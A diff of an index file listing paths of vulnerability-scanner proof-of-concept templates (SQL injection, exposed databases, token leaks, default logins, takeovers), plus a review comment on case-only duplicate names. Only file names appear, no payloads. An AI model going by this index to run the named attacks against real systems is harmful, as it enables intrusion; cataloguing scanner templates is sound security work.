./poc/sap/sap-spartacus.yaml 
@@ -86281,11 +86262,12 @@ ./poc/sap/sap-web-dispatcher-10078.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10069.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10070.yaml +./poc/sap/sap-web-dispatcher-admin-portal-10071.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10072.yaml ./poc/sap/sap-web-dispatcher-admin-portal-10073.yaml ./poc/sap/sap-web-dispatcher-admin-portal.yaml ./poc/sap/sapfiori-panel-1.yaml -./poc/sap/sapfiori-panel-10034.yaml +./poc/sap/sapfiori-panel-10033.yaml ./poc/sap/sapfiori-panel-2.yaml ./poc/sap/sapfiori-panel.yaml ./poc/sap/saphali-woocommerce-lite-f1a8989f3685644493e1506c7b69f933.yaml @@ -86401,7 +86383,7 @@ ./poc/search/ajax-search-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/search/ajax-search-pro-plugin.yaml ./poc/search/ajax-search-pro.yaml -./poc/search/aws-opensearch-login-650.yaml +./poc/search/aws-opensearch-login-649.yaml ./poc/search/aws-opensearch-login.yaml ./poc/search/axublog_v1-search-sqli.yaml ./poc/search/better-search-162a0d80b5d220d9e37c3f6ae9fddb60.yaml @@ -86507,6 +86489,7 @@ ./poc/search/elasticsearch-insecure-default-config.yaml ./poc/search/elasticsearch-log4j.yaml ./poc/search/elasticsearch-sql-client-detect-7189.yaml +./poc/search/elasticsearch-sql-client-detect-7190.yaml ./poc/search/elasticsearch-sql-client-detect-7191.yaml ./poc/search/elasticsearch-sql-client-detect-7192.yaml ./poc/search/elasticsearch-unauth.yaml @@ -86639,7 +86622,6 @@ ./poc/search/search-unleashed-43b47c7d41209b50fd68346a0295170e.yaml ./poc/search/search-unleashed.yaml ./poc/search/searchbar.yaml -./poc/search/searches.yaml ./poc/search/searchiq-486b2d79f520ba9226667882d1e0c61d.yaml ./poc/search/searchiq-5009d6ede19c15ff2d2f30c18e0f60b2.yaml ./poc/search/searchiq-5f115235a8b59c98637592fa393641f7.yaml 
@@ -86812,7 +86794,6 @@ ./poc/sensitive/sensitive-storage-exposure-4.yaml ./poc/sensitive/sensitive-storage-exposure-5.yaml ./poc/sensitive/sensitive-storage-exposure-6.yaml -./poc/sensitive/sensitive-storage-exposure.yaml ./poc/sensitive/sensitives.yaml ./poc/sensitive/typo3-sensitive-files.yaml ./poc/sensitive/wordpress-sensitive-config.yaml @@ -86821,14 +86802,13 @@ ./poc/sensitive/zenphoto-installation-sensitive-info-2.yaml ./poc/sensitive/zenphoto-installation-sensitive-info-3.yaml ./poc/sensitive/zenphoto-installation-sensitive-info-4.yaml -./poc/sensitive/zenphoto-installation-sensitive-info.yaml ./poc/sensitive/zenphoto-sensitive-info-1.yaml +./poc/sensitive/zenphoto-sensitive-info-11784.yaml ./poc/sensitive/zenphoto-sensitive-info-2.yaml ./poc/sensitive/zenphoto-sensitive-info-3.yaml ./poc/sensitive/zenphoto-sensitive-info-4.yaml ./poc/sensitive/zenphoto-sensitive-info.yaml ./poc/sharepoint/exposed-sharepoint-list-7344.yaml -./poc/sharepoint/exposed-sharepoint-list-7345.yaml ./poc/sharepoint/exposed-sharepoint-list-7346.yaml ./poc/sharepoint/exposed-sharepoint-list-7347.yaml ./poc/sharepoint/microsoft-sharepoint.yaml @@ -86841,17 +86821,15 @@ ./poc/shopify/import-shopify-to-woocommerce.yaml ./poc/shopify/seoking-shopify-app.yaml ./poc/shopify/shopify-app-installer.yaml -./poc/shopify/shopify-custom-token-10198.yaml +./poc/shopify/shopify-custom-token(1).yaml ./poc/shopify/shopify-custom-token-11860.yaml ./poc/shopify/shopify-custom-token.yaml ./poc/shopify/shopify-legacy-private-app-token.yaml ./poc/shopify/shopify-private-token-10199.yaml -./poc/shopify/shopify-private-token-11861.yaml ./poc/shopify/shopify-private-token.yaml ./poc/shopify/shopify-public-access.yaml ./poc/shopify/shopify-shared-secret-11862.yaml ./poc/shopify/shopify-shared-secret.yaml -./poc/shopify/shopify-takeover-10201.yaml ./poc/shopify/shopify-takeover-10202.yaml ./poc/shopify/shopify-takeover-10203.yaml ./poc/shopify/shopify-takeover-10204.yaml 
@@ -86879,7 +86857,7 @@ ./poc/smtp/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml ./poc/smtp/easy-wp-smtp-listing-7154.yaml ./poc/smtp/easy-wp-smtp-listing-7155.yaml -./poc/smtp/easy-wp-smtp-listing-7157.yaml +./poc/smtp/easy-wp-smtp-listing-7156.yaml ./poc/smtp/easy-wp-smtp-listing.yaml ./poc/smtp/easy-wp-smtp.yaml ./poc/smtp/esmtp-detect.yaml @@ -86893,6 +86871,7 @@ ./poc/smtp/fluent-smtp-9cf8fafd63ba25b0026079b7736ef163.yaml ./poc/smtp/fluent-smtp.yaml ./poc/smtp/msmtp-config-8966.yaml +./poc/smtp/msmtp-config-8967.yaml ./poc/smtp/post-smtp-01bed4d8fc18f92e932ac3e1e0f4f5cb.yaml ./poc/smtp/post-smtp-1c60fa32acf2539fdc2944eaf19fbe1e.yaml ./poc/smtp/post-smtp-20b5a1223c8140b840ffff5422240c1d.yaml @@ -87258,7 +87237,6 @@ ./poc/social/facebook-phish.yaml ./poc/social/facebook-secret-7386.yaml ./poc/social/facebook-secret.yaml -./poc/social/facebook-secrets.yaml ./poc/social/facebook-wall-and-social-integration-739e4454fbb308c937ef75bb1786deff.yaml ./poc/social/facebook-wall-and-social-integration.yaml ./poc/social/facebook.yaml @@ -87312,7 +87290,7 @@ ./poc/social/floating-social-media-links-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/floating-social-media-links-plugin.yaml ./poc/social/floating-social-media-links.yaml -./poc/social/flow-flow-social-stream-xss.yaml +./poc/social/flow-flow-social-stream-xss-7524.yaml ./poc/social/flow-flow-social-streams-0b11cbe599572e7479985362c28e5bab.yaml ./poc/social/flow-flow-social-streams-b2ca9c85649f9ca0a5356ebbebb714ec.yaml ./poc/social/flow-flow-social-streams-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87418,7 +87396,6 @@ ./poc/social/kiwi-social-share.yaml ./poc/social/lazy-facebook-comments-869b4c99b310f9132fffb57ed8a544a0.yaml ./poc/social/lazy-facebook-comments.yaml -./poc/social/linkedin-id-11853.yaml ./poc/social/linkedin-id.yaml ./poc/social/linkedin-phish.yaml ./poc/social/linkedin.yaml 
@@ -87504,10 +87481,10 @@ ./poc/social/rimons-twitter-widget-8b341a5853c74db00a81c6612967b88a.yaml ./poc/social/rimons-twitter-widget.yaml ./poc/social/sassy-social-share-054e10a9454bde60b36d0b76ce12b2f2.yaml +./poc/social/sassy-social-share-10083.yaml ./poc/social/sassy-social-share-10084.yaml ./poc/social/sassy-social-share-10085.yaml ./poc/social/sassy-social-share-10086.yaml -./poc/social/sassy-social-share-10087.yaml ./poc/social/sassy-social-share-380a93a6eb0678027b6e7c5b3db32454.yaml ./poc/social/sassy-social-share-5d7eeac9d47ec654e4d9145037a7ff62.yaml ./poc/social/sassy-social-share-5d9f6b221c4bba02420d23f606a1608b.yaml @@ -87521,6 +87498,7 @@ ./poc/social/sassy-social-share-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/sassy-social-share-plugin.yaml ./poc/social/sassy-social-share-xss.yaml +./poc/social/sassy-social-share.yaml ./poc/social/scriptless-social-sharing-e6bc780a169375a20634676d371e4d7b.yaml ./poc/social/scriptless-social-sharing.yaml ./poc/social/seed-social-2469f603fdf449edfed5d7210aa6c605.yaml @@ -87997,11 +87975,11 @@ ./poc/sql/74cms-show-sqli.yaml ./poc/sql/74cms-sqli-1.yaml ./poc/sql/74cms-sqli-1.yml -./poc/sql/74cms-sqli-10.yaml ./poc/sql/74cms-sqli-2.yaml ./poc/sql/74cms-sqli-2.yml ./poc/sql/74cms-sqli-8.yaml ./poc/sql/74cms-sqli-9.yaml +./poc/sql/74cms-sqli.yaml ./poc/sql/74cms-sqli.yml ./poc/sql/74cms_V3-plusa-sqli.yaml ./poc/sql/74cms_v4-register-sqli.yaml @@ -90128,8 +90106,8 @@ ./poc/sql/analytics-insights-a52a48fcebcdb3625a324cff9c9c4abe.yaml ./poc/sql/android-debug-database-exposed-312.yaml ./poc/sql/android-debug-database-exposed-313.yaml +./poc/sql/android-debug-database-exposed-314.yaml ./poc/sql/android-debug-database-exposed-315.yaml -./poc/sql/android-debug-database-exposed-316.yaml ./poc/sql/android-debug-database-exposed.yaml ./poc/sql/anfrageformular-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/animate-everything-6477bf18cad6c823db485408d49b337b.yaml 
@@ -90145,7 +90123,8 @@ ./poc/sql/apache-loadbalancer-364.yaml ./poc/sql/apache-loadbalancer-365.yaml ./poc/sql/apache-loadbalancer.yaml -./poc/sql/api-abuseipdb-384.yaml +./poc/sql/api-abuseipdb-385.yaml +./poc/sql/api-abuseipdb.yaml ./poc/sql/api-dbt.yaml ./poc/sql/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml ./poc/sql/api2cart-bridge-connector-9310170fdba6634de0183ef1f76c24bb.yaml @@ -90409,6 +90388,7 @@ ./poc/sql/buddypress-media-09db3ed600715ed39882e0075ad496ac.yaml ./poc/sql/buddypress-sticky-post-65b7b523caeedbacbd14c75623fa6515.yaml ./poc/sql/buffer-my-post-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/buildbot-panel-803.yaml ./poc/sql/buildbot-panel.yaml ./poc/sql/buildbot-panel.yml ./poc/sql/builder-contact-05cefda973a9af46db8fb07d4529e095.yaml @@ -90494,7 +90474,7 @@ ./poc/sql/chamilo-lms-sqli-1.yaml ./poc/sql/chamilo-lms-sqli-2.yaml ./poc/sql/chamilo-lms-sqli-891.yaml -./poc/sql/chamilo-lms-sqli-892.yaml +./poc/sql/chamilo-lms-sqli.yaml ./poc/sql/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml ./poc/sql/change-login-logo-4238ce6d433fb89e975842e8fdb72cad.yaml ./poc/sql/change-prices-with-time-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -90504,6 +90484,7 @@ ./poc/sql/changjet-tplus-keyinfolist-sqli.yaml ./poc/sql/chanjet-CRM-sqli.yaml ./poc/sql/chanjet-crm-get-usedspace-sql-injection.yaml +./poc/sql/chanjet-crm-sqli.yaml ./poc/sql/chanjetcrm-sqli.yaml ./poc/sql/chanjettplus-sqli.yaml ./poc/sql/charitable-9df7e0ba5fda4510a23ec4adbc13841f.yaml 
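Review bot: The added entry `./poc/sql/chanjet-crm-sqli.yaml` in the last hunk on this line differs from the existing `./poc/sql/chanjet-CRM-sqli.yaml` only in letter case, so a checkout on a case-insensitive filesystem keeps just one of the two and the template that actually runs may not be the one this list names. The same pattern shows up in later hunks with `./poc/sql/yongyou-jdbcread.yaml` next to `./poc/sql/yongyou-jdbcRead.yaml`, and with `./poc/sql_injection/chanjet-crm-sqli.yaml`. Whether the paired files differ in content is not visible from this listing. I would keep a single spelling per template and have the job that builds poc.txt fail on case-insensitive duplicates, for example with `sort -f poc.txt | uniq -di`.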
@@ -90691,10 +90672,11 @@ ./poc/sql/couchdb-admin-party.yaml ./poc/sql/couchdb-adminparty-1235.yaml ./poc/sql/couchdb-adminparty-1236.yaml +./poc/sql/couchdb-adminparty-1237.yaml ./poc/sql/couchdb-adminparty.yaml ./poc/sql/couchdb-cve-2017-12635.yml ./poc/sql/couchdb-detect.yaml -./poc/sql/couchdb-exposure-1238.yaml +./poc/sql/couchdb-exposure-1239.yaml ./poc/sql/couchdb-exposure-1240.yaml ./poc/sql/couchdb-exposure-1241.yaml ./poc/sql/couchdb-exposure.yaml @@ -90826,13 +90808,14 @@ ./poc/sql/date-time-picker-field-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/date-time-picker-field-f9e5579db8346e24e94a94b4128866ec.yaml ./poc/sql/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml -./poc/sql/db-backup-lfi-6774.yaml +./poc/sql/db-backup-lfi-6775.yaml ./poc/sql/db-backup-lfi-6776.yaml ./poc/sql/db-backup-lfi.yaml ./poc/sql/db-backup.yaml ./poc/sql/db-schema-1.yaml ./poc/sql/db-schema-2.yaml ./poc/sql/db-schema-3.yaml +./poc/sql/db-schema-6783.yaml ./poc/sql/db-schema-6784.yaml ./poc/sql/db-schema-6785.yaml ./poc/sql/dbapp-jumpserver-service-useradd.yaml @@ -90841,7 +90824,6 @@ ./poc/sql/dbeaver-credentials-6777.yaml ./poc/sql/dbeaver-credentials-6778.yaml ./poc/sql/dbeaver-credentials-6779.yaml -./poc/sql/dbeaver-credentials-6780.yaml ./poc/sql/dbeaver-credentials-6781.yaml ./poc/sql/dbeaver-credentials-6782.yaml ./poc/sql/dbeaver-data-sources.yaml @@ -90856,10 +90838,10 @@ ./poc/sql/debug-log-manager-df86fb073cfdbcf3c878e8167244dee2.yaml ./poc/sql/dedecms-guestbook-sqli.yaml ./poc/sql/dedecms-guestbook-sqli.yml +./poc/sql/dedecms-membergroup-sqli-6796.yaml ./poc/sql/dedecms-membergroup-sqli-6797.yaml ./poc/sql/dedecms-membergroup-sqli-6798.yaml ./poc/sql/dedecms-membergroup-sqli-6799.yaml -./poc/sql/dedecms-membergroup-sqli.yaml ./poc/sql/dedecms-membergroup-sqli.yml ./poc/sql/defender-security-2020b15b8eb9ba5370b2afa3c6dbea78.yaml ./poc/sql/defender-security-89eba353f6f79e2d842308338b651ddb.yaml 
@@ -90907,7 +90889,6 @@ ./poc/sql/doneren-met-mollie-5892523ec2265ec2c4db0a351f404d23.yaml ./poc/sql/donorbox-donation-form-7e3cdcd7322fdba36cae6661c4404f33.yaml ./poc/sql/dotnetcms-sqli-7089.yaml -./poc/sql/dotnetcms-sqli.yaml ./poc/sql/dotnetcms-sqli.yml ./poc/sql/download-from-files-a1fa06fbb5bc053d589b33ccdbbdc2f9.yaml ./poc/sql/download-manager-03951c916730f541db7606ebff038a6c.yaml @@ -90956,7 +90937,9 @@ ./poc/sql/dukapress-42d1930756a0a540db942aacdf5f0b12.yaml ./poc/sql/duomicms-sql-injection-7122.yaml ./poc/sql/duomicms-sql-injection-7123.yaml +./poc/sql/duomicms-sql-injection-7124.yaml ./poc/sql/duomicms-sql-injection-7125.yaml +./poc/sql/duomicms-sql-injection.yaml ./poc/sql/duomicms-sqli.yaml ./poc/sql/duomicms-sqli.yml ./poc/sql/duplicate-page-219a16f0f3edb724b96c66d462f64166.yaml @@ -91056,6 +91039,7 @@ ./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml ./poc/sql/ecology-sqli2.yaml ./poc/sql/ecology-syncuserinfo-sqli-7177.yaml +./poc/sql/ecology-syncuserinfo-sqli.yaml ./poc/sql/ecology-syncuserinfo-sqli.yml ./poc/sql/ecology-v8-sqli.yaml ./poc/sql/ecology-v8-sqli.yml @@ -91087,6 +91071,7 @@ ./poc/sql/elasta-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/elasta-9437ebb08533440a4a517ccdbbdd6db9.yaml ./poc/sql/elasticsearch-sql-client-detect-7189.yaml +./poc/sql/elasticsearch-sql-client-detect-7190.yaml ./poc/sql/elasticsearch-sql-client-detect-7191.yaml ./poc/sql/elasticsearch-sql-client-detect-7192.yaml ./poc/sql/elation-6477bf18cad6c823db485408d49b337b.yaml @@ -91161,6 +91146,7 @@ ./poc/sql/ethereumico-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/ethpress-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/etouch-v2-sqli-7265.yaml +./poc/sql/etouch-v2-sqli-7266.yaml ./poc/sql/etouch-v2-sqli-7267.yaml ./poc/sql/etouch-v2-sqli-7268.yaml ./poc/sql/etouch-v2-sqli.yml 
@@ -91200,6 +91186,7 @@ ./poc/sql/export-to-text-862d66478661085dbcc88bd65de30940.yaml ./poc/sql/exposed-adb-7280.yaml ./poc/sql/exposed-adb-7281.yaml +./poc/sql/exposed-adb-7282.yaml ./poc/sql/exposed-adb.yaml ./poc/sql/exposed-mysql-initial-7321.yaml ./poc/sql/exposed-mysql-initial-7322.yaml @@ -91470,6 +91457,7 @@ ./poc/sql/glorious-services-support-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/glpi-9.3.3-sql-injection.yaml ./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml ./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/go-viral-6477bf18cad6c823db485408d49b337b.yaml @@ -91772,7 +91760,6 @@ ./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml ./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml -./poc/sql/kevinlab-bems-sqli-8457.yaml ./poc/sql/kevinlab-bems-sqli-8458.yaml ./poc/sql/kevinlab-bems-sqli-8459.yaml ./poc/sql/kevinlab-bems-sqli-8460.yaml @@ -91921,7 +91908,7 @@ ./poc/sql/maxbuttons-a66a8a7e32b7fc1922165ddb61178156.yaml ./poc/sql/maz-loader-b1cca93f4b55112648ec98db79317e10.yaml ./poc/sql/mcms-list-do-sqli.yaml -./poc/sql/mdb-database-file-8796.yaml +./poc/sql/mdb-database-file-8795.yaml ./poc/sql/mdb-database-file.yaml ./poc/sql/mdc-private-message-4d8badd82549db37be67f8f9b51803eb.yaml ./poc/sql/media-download-6477bf18cad6c823db485408d49b337b.yaml 
@@ -91994,13 +91981,13 @@ ./poc/sql/moneymasters-02a4bc9438adbcdaa5664f021e38f12e.yaml ./poc/sql/moneytheme-0560e2fcc6071d361ddbd57a75ed8daf.yaml ./poc/sql/mongodb-detect-8919.yaml +./poc/sql/mongodb-detect-8920.yaml ./poc/sql/mongodb-detect-8921.yaml ./poc/sql/mongodb-detect.yaml ./poc/sql/mongodb-info-enum.yaml ./poc/sql/mongodb-ops-manager-8923.yaml ./poc/sql/mongodb-ops-manager-8924.yaml ./poc/sql/mongodb-ops-manager.yaml -./poc/sql/mongodb-unauth-8925.yaml ./poc/sql/mongodb-unauth-8926.yaml ./poc/sql/mongodb-unauth-8927.yaml ./poc/sql/mongodb-unauth-8928.yaml @@ -92156,7 +92143,7 @@ ./poc/sql/ocean-extra-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/odoo-database-manager-9202.yaml ./poc/sql/odoo-database-manager-9203.yaml -./poc/sql/odoo-database-manager-9205.yaml +./poc/sql/odoo-database-manager-9204.yaml ./poc/sql/odoo-database-manager.yaml ./poc/sql/off-canvas-sidebars-6ad11d341ff184481eedb5b9451b7483.yaml ./poc/sql/official-mailerlite-sign-up-forms-6707baefec25107b95f6524fdb5e747c.yaml @@ -92171,8 +92158,8 @@ ./poc/sql/ooorl-e3ffba36446f7dba2b794300461eb826.yaml ./poc/sql/open-external-links-in-a-new-window-65c98e7490918c36cf9db80ea2af7d28.yaml ./poc/sql/open-user-map-c2ea245347709cabfb352a7cf46c6db8.yaml -./poc/sql/openerp-database-9275.yaml ./poc/sql/openerp-database-9276.yaml +./poc/sql/openerp-database-9277.yaml ./poc/sql/openerp-database-9278.yaml ./poc/sql/openerp-database.yaml ./poc/sql/opening-hours-9fde58251e15e0ed15dbb0f57c33cf3e.yaml 
@@ -92187,14 +92174,11 @@ ./poc/sql/option-tree-ae18e342651d194dbc1007204717b118.yaml ./poc/sql/oracle-dbass-detect-9349.yaml ./poc/sql/oracle-dbass-detect-9350.yaml -./poc/sql/oracle-dbass-detect-9351.yaml -./poc/sql/oracle-dbass-detect.yaml ./poc/sql/oracle-dbcs-9352.yaml ./poc/sql/oracle-dbcs-9353.yaml ./poc/sql/oracle-dbcs-9354.yaml ./poc/sql/oracle-dbcs-9355.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/sql/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/sql/oracle-ebs-sqllog-disclosure-9372.yaml @@ -92257,6 +92241,7 @@ ./poc/sql/paytium-6bfa7db55abe86e184a7874b8579256d.yaml ./poc/sql/paytium-dbb33df02ad82d104f52342b9d1314f4.yaml ./poc/sql/payu-india-dfb44dbc510f4bea6f74c6a6cb7e4f69.yaml +./poc/sql/pbootcms-database-file-download-9469.yaml ./poc/sql/pbootcms-database-file-download.yaml ./poc/sql/pbootcms-database-file-download.yml ./poc/sql/pdf-block-615a079e3552dbff38dc6dbbb7a3554e.yaml @@ -92311,7 +92296,6 @@ ./poc/sql/php-arcade-sqli.yaml ./poc/sql/php-event-calendar-12517f8593a63dbf79626b073a1f1de2.yaml ./poc/sql/php-everywhere-4214d6b172adab03dfd74f128fc5db19.yaml -./poc/sql/phpmyadmin-sql-9534.yaml ./poc/sql/phpmyadmin-sql-9535.yaml ./poc/sql/phpmyadmin-sql-9536.yaml ./poc/sql/phpmyadmin-sql.php-server-1.yaml @@ -92328,6 +92312,7 @@ ./poc/sql/pie-register-1e2d1b7026d2269694eb54e49db13853.yaml ./poc/sql/pie-register-51840cf3f730edb817a845513e726762.yaml ./poc/sql/pie-register-edb5da07e3386d078b8f2dfd3f0d66a1.yaml +./poc/sql/pikpikcusqli.yaml ./poc/sql/pinblocks-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/pinfinity-fcc940cb5d1edc9fa0dbfe45ecb68894.yaml ./poc/sql/piotnet-addons-for-elementor-pro-ff0dbabbd59c76a52ed540a831253c70.yaml 
@@ -92474,6 +92459,7 @@ ./poc/sql/qubely-c7df6e58b6d9b71a85834db950409116.yaml ./poc/sql/quick-adsense-0b4f61661156c48a0f3a621db781441d.yaml ./poc/sql/quick-affiliate-store-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/quick-cms-sqli.yaml ./poc/sql/quick-contact-form-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/quick-event-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/quick-pagepost-redirect-plugin-f2e831db47ee0091e76581fa4f070672.yaml @@ -92685,6 +92671,7 @@ ./poc/sql/seaCMS-sqli.yaml ./poc/sql/seacms-dmku-sqli.yaml ./poc/sql/seacms-sqli(1).yaml +./poc/sql/seacms-sqli-10103.yaml ./poc/sql/seacms-sqli.yml ./poc/sql/seacms-v101v11-comment-api-sqli.yaml ./poc/sql/seamless-donations-1c19a09a0db2341131db2ef5655ee08b.yaml @@ -92922,8 +92909,8 @@ ./poc/sql/springboot-h2-db-rce-10454.yaml ./poc/sql/springboot-h2-db-rce-10455.yaml ./poc/sql/springboot-h2-db-rce-10456.yaml -./poc/sql/springboot-h2-db-rce-10457.yaml ./poc/sql/springboot-h2-db-rce-10458.yaml +./poc/sql/springboot-h2-db-rce.yaml ./poc/sql/sprout-clients-503c868f614fe8f9ba65b257aadb9679.yaml ./poc/sql/sql-buddy.yaml ./poc/sql/sql-dump-1.yaml @@ -92958,7 +92945,6 @@ ./poc/sql/sql-server-report-viewer.yaml ./poc/sql/sql-server-reporting-10507.yaml ./poc/sql/sql-server-reporting-10508.yaml -./poc/sql/sql-server-reporting-10509.yaml ./poc/sql/sql-server-reporting-10510.yaml ./poc/sql/sql-server-reporting.yaml ./poc/sql/sql-shortcode-003f309c7f400c3e24a0ee3414677f42.yaml @@ -92979,7 +92965,6 @@ ./poc/sql/sqli2.yaml ./poc/sql/sqli_b_sleep.yaml ./poc/sql/sqli_error.yaml -./poc/sql/sqli_header-10504.yaml ./poc/sql/sqli_header.yaml ./poc/sql/sqliheader.yaml ./poc/sql/squaretype-091113ce7c8db36e32f582519aa46cca.yaml 
@@ -93066,6 +93051,7 @@ ./poc/sql/surveyfunnel-lite-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/surveys-6e9e122eb2e0c40dbc732f93cb774f75.yaml ./poc/sql/suspicious-sql-error-messages-10586.yaml +./poc/sql/suspicious-sql-error-messages.yaml ./poc/sql/sv-provenexpert-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/sv-tracking-manager-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/svg-flags-lite-6477bf18cad6c823db485408d49b337b.yaml @@ -93078,8 +93064,7 @@ ./poc/sql/sydney-toolbox-6ebed23b763fe33f9cdffde1a1db7852.yaml ./poc/sql/symfony-database-config-10614.yaml ./poc/sql/symfony-database-config-10615.yaml -./poc/sql/symfony-database-config-10616.yaml -./poc/sql/symfony-database-config.yaml +./poc/sql/symfony-database-config-10617.yaml ./poc/sql/sync-ecommerce-neo-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/synotec-holdings-sql-injection.yaml ./poc/sql/syntaxhighlighter-6af94db0b5d5eb521508ffb351943a35.yaml @@ -93136,7 +93121,7 @@ ./poc/sql/thumbs-db-disclosure-10760.yaml ./poc/sql/thumbs-db-disclosure-10761.yaml ./poc/sql/thumbs-db-disclosure-10762.yaml -./poc/sql/thumbs-db-disclosure.yaml +./poc/sql/thumbs-db-disclosure-10763.yaml ./poc/sql/thumbs-rating-2551aea37293f7feb377db28af59096c.yaml ./poc/sql/ti-woocommerce-wishlist-693cf8c022651775af0db87e0b8f752d.yaml ./poc/sql/ti-woocommerce-wishlist-premium-693cf8c022651775af0db87e0b8f752d.yaml @@ -93144,8 +93129,8 @@ ./poc/sql/ticket-manager-a759e03a3140ab5da9f810ffbdb3a4c2.yaml ./poc/sql/ticket-tailor-cd8902dc00bdb1b49cb56acbeb9ca9e4.yaml ./poc/sql/tidb-native-password.yaml +./poc/sql/tidb-unauth-10770.yaml ./poc/sql/tidb-unauth-10771.yaml -./poc/sql/tidb-unauth-10772.yaml ./poc/sql/tidb-unauth.yaml ./poc/sql/tidio-live-chat-5841edbae5f362f60a79d9cb73e8dd52.yaml ./poc/sql/tier-pricing-table-6477bf18cad6c823db485408d49b337b.yaml 
@@ -93221,8 +93206,9 @@ ./poc/sql/typofr-50c7a8d6d6928e0edbdd25d945accee8.yaml ./poc/sql/ubermenu-f5905ac46fc848b6b7db6aec714caee2.yaml ./poc/sql/ucmdb-default-login-10868.yaml -./poc/sql/ucmdb-default-login-10869.yaml ./poc/sql/ucmdb-default-login-10870.yaml +./poc/sql/ucmdb-default-login-10871.yaml +./poc/sql/ucmdb-default-login.yaml ./poc/sql/ucontext-8226db0cec7c7280f1367e900997219e.yaml ./poc/sql/ulisting-5dbc01f7b0f6c2a386a3664610ac3e23.yaml ./poc/sql/ulisting-7866bac5db8939bd8423ae7ad6c6a87c.yaml @@ -93268,6 +93254,7 @@ ./poc/sql/ultra-seven-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml ./poc/sql/unakit-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/unauth-psql.yaml +./poc/sql/unauthenticated-influxdb-10903.yaml ./poc/sql/unauthenticated-influxdb.yaml ./poc/sql/uncanny-automator-5390a51d3ea1667fc8bdb736afeae941.yaml ./poc/sql/uncode-lite-d155d6ddfe8bbad0ff5fa76ddb2b1f37.yaml @@ -93673,6 +93660,7 @@ ./poc/sql/wordpress-db-backup-listing-11250.yaml ./poc/sql/wordpress-db-backup-listing.yaml ./poc/sql/wordpress-db-backup.yaml +./poc/sql/wordpress-db-repair-11252.yaml ./poc/sql/wordpress-db-repair-11253.yaml ./poc/sql/wordpress-db-repair-11254.yaml ./poc/sql/wordpress-db-repair-11255.yaml @@ -93702,7 +93690,6 @@ ./poc/sql/wordpress-woocommerce-sqli-11342.yaml ./poc/sql/wordpress-woocommerce-sqli-11343.yaml ./poc/sql/wordpress-woocommerce-sqli-11344.yaml -./poc/sql/wordpress-woocommerce-sqli-11345.yaml ./poc/sql/wordpress-woocommerce-sqli-2.yaml ./poc/sql/wordpress-woocommerce-sqli.yaml ./poc/sql/wordprezi-584db66faa21db5cdefc91cc7e54449b.yaml @@ -94179,7 +94166,6 @@ ./poc/sql/xcloner-backup-and-restore-af2601db04528a0b59f4305584ecbd5d.yaml ./poc/sql/xdcms-sql.yaml ./poc/sql/xdcms-sql.yml -./poc/sql/xdcms-sqli-11664.yaml ./poc/sql/xdcms-sqli-11665.yaml ./poc/sql/xdcms-sqli-11666.yaml ./poc/sql/xdcms-sqli-11667.yaml 
@@ -94221,6 +94207,7 @@ ./poc/sql/yongyou-KSOA-servletimagefield-sKeyvalue-sqli.yaml ./poc/sql/yongyou-U8-sqli.yaml ./poc/sql/yongyou-jdbcRead.yaml +./poc/sql/yongyou-jdbcread.yaml ./poc/sql/yongyou-u8-KeyWordDetailReportQuery-sql-Injection.yaml ./poc/sql/yongyou-u8-nc-bs-sm-login2-RegisterServlet-sql-Injection.yaml ./poc/sql/yongyou-u8-oa-sqli-11746.yaml @@ -94273,7 +94260,6 @@ ./poc/sql/z-url-preview-cb5a7484dbd994ed6e7ac4e9b63a5368.yaml ./poc/sql/zabbix-cve-2016-10134-sqli.yml ./poc/sql/zarzadzanie_kontem-8ddb37c6c3ab472d4eda177c23c07e30.yaml -./poc/sql/zcms-v3-sqli-11773.yaml ./poc/sql/zcms-v3-sqli-11774.yaml ./poc/sql/zcms-v3-sqli-11775.yaml ./poc/sql/zcms-v3-sqli.yaml @@ -94307,11 +94293,11 @@ ./poc/sql_injection/74cms-show-sqli.yaml ./poc/sql_injection/74cms-sqli-1.yaml ./poc/sql_injection/74cms-sqli-1.yml -./poc/sql_injection/74cms-sqli-10.yaml 